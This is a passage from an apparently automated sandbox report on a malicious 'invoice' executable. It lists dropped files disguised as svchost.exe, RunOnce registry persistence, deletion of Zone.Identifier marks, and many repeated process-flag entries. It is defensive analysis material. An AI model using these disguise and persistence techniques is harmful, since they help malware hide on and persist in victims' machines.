        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeCode function: 0_2_00086302 pushfd ; retf
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeCode function: 0_2_00A62684 push 8400A3C3h; ret
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeCode function: 0_2_0839CAB1 push cs; ret
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeCode function: 0_2_0839CA83 push cs; ret
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 8_2_0040B550 push eax; ret
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 8_2_0040B550 push eax; ret
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 8_2_0040B50D push ecx; ret
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 9_2_0040B550 push eax; ret
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 9_2_0040B550 push eax; ret
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 9_2_0040B50D push ecx; ret

        Persistence and Installation Behavior:

        barindex
        Drops PE files with benign system namesShow sources
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeFile created: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeJump to dropped file
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\1cc51949-2752-4134-b6cf-961241419db1\AdvancedRun.exeJump to dropped file
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeFile created: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeJump to dropped file
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeFile created: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeJump to dropped file
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 8_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce fIvxwJDVdGdMfCgtYuXwXFIxLXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce fIvxwJDVdGdMfCgtYuXwXFIxLXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce fIvxwJDVdGdMfCgtYuXwXFIxLXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce fIvxwJDVdGdMfCgtYuXwXFIxLXJump to behavior

        Hooking and other Techniques for Hiding and Protection:

        barindex
        Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe:Zone.Identifier read attributes | delete
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 8_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
